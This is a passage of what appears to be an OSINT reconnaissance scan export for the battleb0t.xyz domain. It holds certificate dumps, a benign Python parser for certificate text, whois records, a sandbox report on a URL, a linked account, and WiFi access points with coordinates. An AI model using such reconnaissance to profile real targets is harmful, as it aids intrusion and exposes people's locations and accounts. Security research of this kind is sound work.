57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:23:04.766 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D4:53:59:2F:EB:FF:FB:09:BA:76:BB:
E9:A4:81:C3:B1:93:13:10:22:54:A7:54:1C:46:19:3B:
6F:1B:01:CB:65:02:21:00:BB:AD:59:07:F2:64:D8:C4:
FA:7C:E2:49:2B:E4:9B:86:A7:0D:4A:BE:2B:43:0F:BA:
C2:73:EA:C3:69:47:E2:C3
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:23:04.781 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:97:4D:DC:2F:D1:9B:1A:BE:09:EC:A2:
59:20:1E:95:7C:4B:C9:87:AC:96:9A:C3:4F:C0:0E:23:
4F:BC:16:AA:14:02:21:00:B1:07:3B:2C:0B:51:21:34:
74:50:BD:8C:B3:BE:A9:50:07:9B:F0:85:AB:3F:69:A1:
3D:6A:46:9D:88:A6:9A:89
Signature Algorithm: sha256WithRSAEncryption
ad:f7:33:43:81:f3:8d:21:44:85:e2:84:76:49:bc:87:f0:51:
96:b7:88:05:55:85:b8:e1:90:97:3e:c1:69:16:a8:c5:f1:39:
0d:d1:5f:8d:38:e4:0d:8b:e6:47:2a:f6:40:63:03:2b:f0:1f:
be:f8:b1:82:61:91:3b:03:b0:69:20:b4:dc:30:8c:89:f3:1c:
58:10:34:d9:81:b9:21:67:93:a8:46:92:4c:c7:e9:dc:76:7f:
5b:fc:b0:d2:dc:de:8d:94:c5:6b:c4:40:90:a8:e8:74:62:d2:
e6:1b:be:60:7f:96:01:c1:48:4a:c7:bd:8c:53:d2:a6:cf:88:
fa:4c:5d:6b:ed:42:b0:75:30:19:73:a0:d5:65:1d:45:1e:70:
23:da:e7:c5:31:6f:12:d3:54:2e:a3:91:e2:56:46:67:fd:10:
01:29:6e:69:67:d8:1f:99:c8:35:4f:2e:14:20:7c:c8:7b:86:
d6:ea:ed:96:56:81:0a:9f:3d:c7:d8:52:97:ea:0d:0a:ae:e6:
ce:93:f5:1e:0e:18:81:98:ef:d7:e3:a1:ab:63:09:30:4f:8f:
f5:0c:92:d0:84:ce:09:f8:71:10:dd:91:6b:72:67:70:ee:47:
d4:69:c2:95:9e:55:af:5a:cf:d9:19:cf:5f:f9:37:c3:6b:53:
ee:53:f7:4b
|
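Two certificate dumps appear on this page and they are not the same kind of object. The one recorded under SSL Certificate - Raw Data for `nwapi.battleb0t.xyz` carries the critical `CT Precertificate Poison` extension, so it is the precertificate submitted to the CT logs and will never be presented by a server; the one stored as Source Data for `fluid.battleb0t.xyz` carries two SCTs and is the real leaf, but it expired on 15 Feb 2023, months before the 12 May 2023 scan. The following is an added example for pulling those facts out of the `openssl x509 -text` style dumps that SpiderFoot stores, not SpiderFoot's own code; the two inputs are trimmed copies of the dumps above (key and signature hex removed) and the scan time is taken from the row's Date Found column.

```python
"""Parse openssl-style certificate text and flag what an analyst cares about:
subject/SANs, validity on the day of the scan, and precertificate vs. leaf
(added example, not page code)."""
import re
from datetime import datetime, timezone

# Trimmed copies of the two dumps on this page; only the lines the parser reads.
PRECERT_NWAPI = """Certificate:
    Data:
        Version: 3 (0x2)
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Mar 13 12:50:47 2023 GMT
            Not After : Jun 11 12:50:46 2023 GMT
        Subject: CN=nwapi.battleb0t.xyz
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:nwapi.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""

CERT_FLUID = """Certificate:
    Data:
        Version: 3 (0x2)
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Nov 17 13:23:04 2022 GMT
            Not After : Feb 15 13:23:03 2023 GMT
        Subject: CN=fluid.battleb0t.xyz
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:fluid.battleb0t.xyz
            CT Precertificate SCTs:
                Signed Certificate Timestamp:
                    Timestamp : Nov 17 14:23:04.766 2022 GMT
                Signed Certificate Timestamp:
                    Timestamp : Nov 17 14:23:04.781 2022 GMT
"""

# Date Found of the fluid.battleb0t.xyz row, as UTC.
SCAN_TIME = datetime(2023, 5, 12, 2, 56, 50, tzinfo=timezone.utc)


def _parse_time(s):
    # openssl prints validity as e.g. "Mar 13 12:50:47 2023 GMT"
    return datetime.strptime(s.strip(), "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Extract the handful of fields that matter from an openssl text dump."""
    info = {"subject_cn": None, "issuer": None, "not_before": None, "not_after": None,
            "sans": [], "is_precert": False, "sct_count": 0}
    m = re.search(r"^\s*Issuer:\s*(.+)$", text, re.M)
    if m:
        info["issuer"] = m.group(1).strip()
    m = re.search(r"^\s*Subject:.*?CN\s*=\s*([^,\n]+)", text, re.M)
    if m:
        info["subject_cn"] = m.group(1).strip()
    m = re.search(r"Not Before:\s*(.+)", text)
    if m:
        info["not_before"] = _parse_time(m.group(1))
    m = re.search(r"Not After\s*:\s*(.+)", text)
    if m:
        info["not_after"] = _parse_time(m.group(1))
    m = re.search(r"Subject Alternative Name:\s*\n\s*(.+)", text)
    if m:
        info["sans"] = [x.split(":", 1)[1].strip() for x in m.group(1).split(",") if ":" in x]
    # The poison extension marks a CT precertificate; SCTs appear only in the final cert.
    info["is_precert"] = "CT Precertificate Poison" in text
    info["sct_count"] = text.count("Signed Certificate Timestamp:")
    return info


def assess(text, host, at=SCAN_TIME):
    """Return (parsed fields, list of analyst findings) for a host at a given time."""
    c = parse_cert_text(text)
    findings = []
    if c["is_precert"]:
        findings.append("precertificate (CT poison extension): logged to CT, never served by a host")
    if host not in c["sans"]:
        findings.append("host not in SAN")
    if c["not_after"] and at > c["not_after"]:
        findings.append("expired %d days before the scan" % (at - c["not_after"]).days)
    elif c["not_before"] and at < c["not_before"]:
        findings.append("not yet valid at scan time")
    return c, findings


if __name__ == "__main__":
    for name, text in (("nwapi.battleb0t.xyz", PRECERT_NWAPI), ("fluid.battleb0t.xyz", CERT_FLUID)):
        parsed, notes = assess(text, name)
        print(name, parsed["not_before"].date(), "->", parsed["not_after"].date(), notes)
```

The practical caveat: an expired or precertificate record in an OSINT export proves the name existed and was issued for at some point, not that the host was serving TLS with it on the scan date. Confirm the live chain against the host before treating the certificate as current infrastructure.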
| 2023-05-12 02:44:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 127.97.148.34.bc.googleusercontent.com | 34.148.97.127 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/battleb0t | battleb0t |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 5G (Net ID: 00:02:6F:F8:0A:41) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:16 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://macinstruct.sertfidancilik.com/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2434.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "x1.c.lencr.org"\n "ocsp.rootca1.amazontrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"104.21.7.33:443"\n "65.8.165.119:443"\n "104.196.30.220:443"\n "172.67.176.214:443"\n "65.8.165.51:80"\n "23.61.169.89:80"\n "65.8.165.104:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_dc4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_dc4_IESQMMUTEX_0_519"\n "IsoScope_dc4_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_dc4_ConnHashTable<3524>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3524"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_dc4_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_dc4_IE_EarlyTabStart_0x530_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\MSIMGSIZECacheMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data Windows 2000/XP setup 4817 bytes 1 file at 0x2c +A "disallowedcert.stl" number 1 1 datablock 0x1 compression"\n "Cab2433.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n 
"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62397 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "4L134F50.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4L134F50.txt]- [targetUID: 00000000-00003524]\n Dropped file: "XVLMDIKC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XVLMDIKC.txt]- [targetUID: 00000000-00003524]\n Dropped file: "CVDBBF2V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CVDBBF2V.txt]- [targetUID: 00000000-00003524]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsmacinstruct.sertfidancilik.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003384]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003524]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003384]\n "logo_1_.png" has type "PNG image data 128 x 128 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003384]\n "~DF77AE68F8612CDCE2.TMP" has type "data"- Location: [%TEMP%\\~DF77AE68F8612CDCE2.TMP]- [targetUID: 00000000-00003524]\n "9FF67FB3141440EED32363089565AE60_1A2C71E1B961FDAC74FBE1C7D07896B1" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9FF67FB3141440EED32363089565AE60_1A2C71E1B961FDAC74FBE1C7D07896B1]- [targetUID: 00000000-00003384]\n "iphone_1_.png" has type "PNG image data 1024 x 1024 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "4L134F50.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4L134F50.txt]- [targetUID: 00000000-00003524]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003524]\n "80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE]- [targetUID: 00000000-00003524]\n "5E42C65D472B356D49EB3B8AD6849196" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\5E42C65D472B356D49EB3B8AD6849196]- [targetUID: 00000000-00003384]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00003384]\n "O7UT3CDV.htm" has type "HTML document ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\O7UT3CDV.htm]- [targetUID: 00000000-00003384]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003524]\n "mac_1_.png" has type "PNG image data 1024 x 1024 8-bit/color RGBA non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://macinstruct.sertfidancilik.com/"\n Pattern match: "https://macinstruct.sertfidancilik.com"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: 
Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-s | 104.196.30.220 |
| 2023-05-12 02:44:21 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 185.199.108.153:443 | 185.199.108.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NH-NEW (Net ID: 00:01:21:30:F0:D3) | 37.7642, -122.3993 |
| 2023-05-12 03:42:54 | Affiliate - Domain Whois | No | Whois | 3 | 0 | 6 | 0 | None | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: inflany.com
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: https://www.world4you.com
Updated Date: 2023-04-13T21:36:05Z
Creation Date: 2022-04-12T14:21:11Z
Registrar Registration Expiration Date: 2024-04-12T14:21:12Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email: abuse@world4you.com
Registrar Abuse Contact Phone: +43.73293035
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization:
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AT
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: https://whoispro.domain-robot.org/whois/inflany.com
Name Server: ns1.world4you.at
Name Server: ns2.world4you.at
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:42:54Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
# World4You Internet Services GmbH WHOIS service.
#
# The data in the World4You WHOIS database is provided to you by
# World4You Internet Services GmbH for informational purposes only and
# may be used to assist persons in obtaining information about or
# related to a domain name registration record.
# Except for agreed Internet operational purposes (such as register or
# modify existing registrations), no part of this information may be
# stored, reproduced or transmitted by any means.
# World4You does not guarantee its accuracy.
#
# By submitting a WHOIS query, you agree that you will use this data
# only for lawful purposes and that, under no circumstances, you will
# use this data to
# (1) allow, enable, or otherwise support the transmission of mass
# unsolicited, commercial advertising or solicitations via E-mail
# (spam); or
# (2) enable high volume, automated, electronic processes that apply
# to World4You (or its computer systems).
# World4You reserves the right to modify these terms at any time.
# By submitting this query, you agree to abide by this policy.
# www.world4you.com - Your hostingprovider.at
| inflany.com |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 403 | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS_24 (Net ID: 00:00:C5:D7:60:DC) | 41.8781, -87.6298 |
| 2023-05-12 03:17:35 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: AYU.XYZ
Registry Domain ID: D9607467-CNIC
Registrar WHOIS Server: whois.west.cn
Registrar URL: http://www.west.cn
Updated Date: 2023-02-11T09:04:01.0Z
Creation Date: 2015-08-20T20:34:37.0Z
Registry Expiry Date: 2023-08-20T23:59:59.0Z
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Registrar IANA ID: 1556
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: Jiang Su
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS5.MYHOSTADMIN.NET
Name Server: NS6.MYHOSTADMIN.NET
Name Server: NS1.MYHOSTADMIN.NET
Name Server: NS2.MYHOSTADMIN.NET
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@west.cn
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayu.xyz
Registry Domain ID: xy74494296952501
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2015-08-20T20:34:39.0Z
Creation Date: 2015-08-20T20:34:39.0Z
